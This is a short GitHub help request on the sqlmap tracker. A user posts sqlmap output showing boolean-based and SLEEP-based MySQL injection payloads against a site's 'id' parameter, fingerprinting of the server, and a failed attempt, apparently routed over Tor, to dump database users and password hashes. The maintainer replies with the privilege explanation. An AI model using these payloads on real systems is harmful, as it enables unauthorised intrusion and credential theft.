sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Need help? #745

Closed redlin3e closed 10 years ago

redlin3e commented 10 years ago
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
    Payload: id=MAKE_SET(9616=9616,15)

    Type: AND/OR time-based blind
    Title: MySQL time-based blind - Parameter replace (bool*int)
    Payload: id=(8507=8507)*SLEEP(25)

---
[01:16:18] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[01:16:18] [INFO] testing MySQL
[01:16:18] [INFO] confirming MySQL
[01:16:18] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL >= 5.0.0
[01:16:18] [INFO] fetching current user
[01:16:18] [INFO] retrieving the length of query output
[01:16:18] [INFO] resumed: 18
[01:16:18] [INFO] resumed: baroody@%
current user:    'baroody@%'
[01:16:18] [INFO] fetching database users password hashes
[01:16:18] [INFO] fetching database users
[01:16:18] [INFO] fetching number of database users
[01:16:18] [INFO] resumed: 1
[01:16:18] [INFO] retrieving the length of query output
[01:16:23] [INFO] retrieved:   
[01:16:35] [INFO] retrieved:   
[01:16:35] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[01:16:35] [WARNING] it's highly recommended to avoid usage of switch '--tor' for time-based injections because of its high latency time                                 
[01:16:35] [WARNING] time-based comparison requires larger statistical model, please wait.......................
[01:17:12] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[01:17:14] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
[01:17:18] [INFO] retrieved:   
[01:17:18] [ERROR] unable to retrieve the database users
[01:17:18] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system database table)
[01:17:18] [INFO] fetched data logged to text files under '/home/b0x/.sqlmap/output/website.com'

[*] shutting down at 01:17:18

stamparm commented 10 years ago
most probably because the session user has no read privileges over the relevant system database table